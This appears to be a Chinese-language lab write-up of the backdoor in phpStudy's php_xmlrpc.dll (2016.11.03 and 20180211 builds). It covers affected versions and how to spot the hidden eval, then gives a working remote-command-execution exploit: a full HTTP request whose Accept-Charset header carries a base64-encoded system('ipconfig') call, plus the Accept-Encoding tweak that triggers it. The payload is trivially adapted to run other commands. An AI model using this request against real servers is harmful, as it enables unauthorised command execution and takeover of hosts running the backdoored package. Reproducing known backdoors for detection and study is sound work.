1.環境
測試的是這兩個版本
phpStudy_2016.11.03 後門版
PhpStudy20180211 後門版
PhpStudy軟件對於國內衆多開發者而言,並不陌生。它是一款免費的PHP調試環境的程序集成包,集成了最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款軟件一次性安裝,無需配置即可直接使用,具有PHP環境調試和PHP開發功能。因爲免費公益、簡易方便,現已發展到一定的規模,有着近百萬PHP語言學習者、開發者用戶。
2.原理
程序包自帶PHP的php_xmlrpc.dll模塊隱藏有後門
3.影響版本
phpStudy20161103版本:
php5.4.45與php5.2.17
phpStudy20180211版本:
php5.4.45與php5.2.17
4.後門檢測
下載對應版本,啓動對應版本
檢查一下後門文件有沒有
位置:
xxxx\phpstudy\PHPTutorial\php\php-5.2.17\ext
我用的是這個版本
xxxx\phpstudy\PHPTutorial\php\php-5.4.45\ext
找到目錄下的php_xmlrpc.dll文件
打開搜索eval關鍵字:
這就算是存在
5.漏洞利用
然後隨便訪問一個php文件
抓包改掉請求頭字段:
accept-Encoding中逗號後面的空格要去掉
Accept-Charset爲system('ipconfig')的base64編碼
改完
accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==
包
GET / HTTP/1.1
Host: 10.77.0.100
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0